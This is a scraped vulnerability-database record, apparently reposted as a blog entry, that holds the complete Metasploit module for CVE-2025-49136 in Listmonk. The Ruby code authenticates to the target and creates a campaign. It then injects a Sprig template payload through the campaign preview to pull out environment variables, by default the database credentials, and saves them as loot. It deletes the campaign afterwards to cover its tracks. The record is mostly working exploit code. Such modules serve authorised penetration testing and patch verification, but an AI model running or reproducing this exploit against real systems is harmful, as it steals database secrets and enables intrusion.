{“lastseen”:”2025-10-09T20:02:17″,”description”:”This module exploits insecure Sprig template functions in Listmonk versions prior to v5.0.2. The env and expandenv functions are enabled …”,”published”:”2025-10-09T18:53:51″,”modified”:”2025-10-09T18:53:51″,”type”:”metasploit”,”title”:”Listmonk Insecure Sprig Template Functions Environment Disclosure”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-LISTMONK_ENV_DISCLOSURE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-49136″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Listmonk Insecure Sprig Template Functions Environment Disclosure’,\\n ‘Description’ =\\u003e %q{\\n This module exploits insecure Sprig template functions in Listmonk\\n versions prior to v5.0.2. The env and expandenv functions are enabled\\n by default, allowing authenticated users with campaign permissions to\\n extract sensitive environment variables via campaign preview.\\n },\\n ‘Author’ =\\u003e [‘Tarek Nakkouch’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-49136’],\\n [‘URL’, ‘https:\/\/github.com\/knadh\/listmonk\/security\/advisories\/GHSA-jc7g-x28f-3v3h’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-06-08’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options([\\n Opt::RPORT(9000),\\n OptString.new(‘TARGETURI’, [true, ‘Base path to Listmonk’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘Listmonk username’]),\\n OptString.new(‘PASSWORD’, [true, ‘Listmonk password’]),\\n OptString.new(‘ENVVAR’, [false, ‘Comma-separated list of environment variables to read (uses default list if not set)’]),\\n OptString.new(‘CAMPAIGN_NAME’, [false, ‘Campaign name (random if not set)’])\\n ])\\n end\\n\\n def check\\n begin\\n login\\n rescue Msf::Exploit::Failed\\n return Msf::Exploit::CheckCode::Unknown(‘Authentication failed’)\\n end\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘about’)\\n })\\n\\n return Msf::Exploit::CheckCode::Unknown(‘Connection failed’) unless res\\n\\n if res.code == 200\\n json = res.get_json_document\\n return Msf::Exploit::CheckCode::Unknown(‘Failed to parse version information’) unless json\\n\\n if json[‘version’]\\n version_string = json[‘version’].gsub(\/^v\/, ”)\\n version = Rex::Version.new(version_string)\\n if version \\u003e= Rex::Version.new(‘4.0.0’) \\u0026\\u0026 version \\u003c Rex::Version.new(‘5.0.2’)\\n return Msf::Exploit::CheckCode::Appears(\\”Listmonk version #{version_string} is vulnerable\\”)\\n else\\n return Msf::Exploit::CheckCode::Safe(\\”Listmonk version #{version_string} is patched\\”)\\n end\\n end\\n end\\n\\n Msf::Exploit::CheckCode::Unknown(‘Could not determine if target is running Listmonk’)\\n end\\n\\n def get_nonce\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin’, ‘login’)\\n })\\n\\n fail_with(Failure::Unreachable, ‘Connection failed’) unless res\\n\\n html = res.get_html_document\\n fail_with(Failure::UnexpectedReply, ‘Could not parse HTML login page’) unless html\\n\\n nonce = html.at(‘input[@name=\\”nonce\\”]\/@value’)\\n fail_with(Failure::UnexpectedReply, ‘Could not extract nonce from login page’) unless nonce\\n\\n nonce.text\\n end\\n\\n def login\\n nonce = get_nonce\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin’, ‘login’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e {\\n ‘nonce’ =\\u003e nonce,\\n ‘next’ =\\u003e ‘\/admin’,\\n ‘username’ =\\u003e datastore[‘USERNAME’],\\n ‘password’ =\\u003e datastore[‘PASSWORD’]\\n }\\n })\\n\\n fail_with(Failure::Unreachable, ‘Connection failed during login’) unless res\\n\\n if res.code == 302\\n print_good(‘Login successful’)\\n else\\n fail_with(Failure::NoAccess, \\”Login failed with code #{res.code}\\”)\\n end\\n end\\n\\n def create_campaign\\n # Use random campaign name to avoid collisions on re-runs and reduce fingerprinting\\n campaign_name = datastore[‘CAMPAIGN_NAME’] || Rex::Text.rand_text_alpha(8..12)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘campaigns’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n ‘archiveSlug’ =\\u003e campaign_name,\\n ‘name’ =\\u003e campaign_name,\\n ‘subject’ =\\u003e campaign_name,\\n ‘lists’ =\\u003e [1],\\n ‘from_email’ =\\u003e ‘listmonk \\u003cnoreply@listmonk.yoursite.com\\u003e’,\\n ‘content_type’ =\\u003e ‘richtext’,\\n ‘messenger’ =\\u003e ’email’,\\n ‘type’ =\\u003e ‘regular’,\\n ‘tags’ =\\u003e [],\\n ‘send_at’ =\\u003e nil,\\n ‘headers’ =\\u003e [],\\n ‘media’ =\\u003e []\\n }.to_json\\n })\\n\\n fail_with(Failure::Unreachable, ‘Connection failed during campaign creation’) unless res\\n\\n if res.code == 200\\n parsed = res.get_json_document\\n fail_with(Failure::UnexpectedReply, ‘Failed to parse campaign creation response’) unless parsed\\n\\n campaign_id = parsed[‘data’][‘id’]\\n vprint_status(\\”Campaign created with ID: #{campaign_id}\\”)\\n return campaign_id\\n else\\n fail_with(Failure::Unknown, \\”Failed to create campaign: #{res.code}\\”)\\n end\\n end\\n\\n def preview_campaign(campaign_id, payload)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘campaigns’, campaign_id.to_s, ‘preview’),\\n ‘vars_post’ =\\u003e {\\n ‘template_id’ =\\u003e ‘1’,\\n ‘content_type’ =\\u003e ‘richtext’,\\n ‘body’ =\\u003e payload\\n }\\n })\\n\\n fail_with(Failure::Unreachable, ‘Connection failed during preview’) unless res\\n\\n fail_with(Failure::Unknown, \\”Preview failed with code: #{res.code}\\”) unless res.code == 200\\n extract_results(res.body)\\n end\\n\\n def default_env_vars\\n [\\n ‘LISTMONK_db__host’,\\n ‘LISTMONK_db__port’,\\n ‘LISTMONK_db__user’,\\n ‘LISTMONK_db__password’,\\n ‘LISTMONK_db__database’,\\n ‘LISTMONK_app__address’\\n ]\\n end\\n\\n def delete_campaign(campaign_id)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘campaigns’, campaign_id.to_s)\\n })\\n\\n if res \\u0026\\u0026 res.code == 200\\n vprint_good(\\”Campaign #{campaign_id} deleted successfully\\”)\\n else\\n print_warning(\\”Failed to delete campaign #{campaign_id}\\”)\\n end\\n end\\n\\n def extract_results(html)\\n doc = Nokogiri::HTML(html)\\n wrap_div = doc.at(‘div[@class=\\”wrap\\”]’)\\n fail_with(Failure::UnexpectedReply, ‘Could not find wrap div in response’) unless wrap_div\\n\\n paragraphs = wrap_div.search(‘p’).map(\\u0026:text).map(\\u0026:strip).reject(\\u0026:empty?)\\n\\n if paragraphs.any?\\n print_good(‘Environment variable(s) extracted:’)\\n print_line(”)\\n paragraphs.each do |result|\\n print_line(result.to_s)\\n end\\n\\n loot_data = paragraphs.join(\\”\\\\n\\”)\\n store_loot(\\n ‘listmonk.env’,\\n ‘text\/plain’,\\n rhost,\\n loot_data,\\n ‘listmonk_env_disclosure.txt’,\\n ‘Listmonk Environment Variables’\\n )\\n print_line(”)\\n\\n return paragraphs\\n else\\n print_error(‘No results found in response’)\\n return []\\n end\\n end\\n\\n def run\\n print_status(\\”Targeting #{full_uri}\\”)\\n\\n # Determine which environment variables to extract\\n if datastore[‘ENVVAR’]\\n env_vars = datastore[‘ENVVAR’].split(‘,’).map(\\u0026:strip)\\n print_status(\\”Targeting specific environment variables: #{env_vars.join(‘, ‘)}\\”)\\n else\\n env_vars = default_env_vars\\n print_status(\\”Using default environment variable list (#{env_vars.length} variables)\\”)\\n end\\n\\n # Build payload with all environment variables\\n payload_parts = env_vars.map do |var|\\n \\”\\u003cp\\u003e#{var}: {{ env \\\\\\”#{var}\\\\\\” }}\\u003c\/p\\u003e\\”\\n end\\n payload = payload_parts.join\\n\\n login\\n\\n begin\\n campaign_id = create_campaign\\n print_status(‘Executing template to extract environment variables…’)\\n preview_campaign(campaign_id, payload)\\n ensure\\n # Clean up by deleting the campaign even if extraction fails\\n delete_campaign(campaign_id) if campaign_id\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/listmonk_env_disclosure.rb”,”cvss”:{“score”:9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/listmonk_env_disclosure\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-09T20:02:17″,”description”:”This module exploits insecure Sprig template functions in Listmonk versions prior to v5.0.2. The env and expandenv functions are enabled …”,”published”:”2025-10-09T18:53:51″,”modified”:”2025-10-09T18:53:51″,”type”:”metasploit”,”title”:”Listmonk Insecure Sprig Template Functions…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,86,12,169,13,7,11,5],"class_list":["post-20864","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-90","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n